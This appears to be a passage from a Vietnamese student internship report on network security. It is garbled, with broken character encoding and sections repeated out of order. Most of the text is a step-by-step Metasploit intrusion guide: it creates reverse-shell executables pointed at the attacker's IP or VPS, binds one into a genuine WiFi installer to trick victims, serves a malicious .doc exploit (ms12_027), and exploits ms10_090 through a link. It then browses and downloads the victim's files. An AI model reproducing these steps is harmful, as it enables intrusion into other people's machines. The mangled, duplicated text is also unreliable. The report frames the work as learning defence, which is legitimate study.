Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
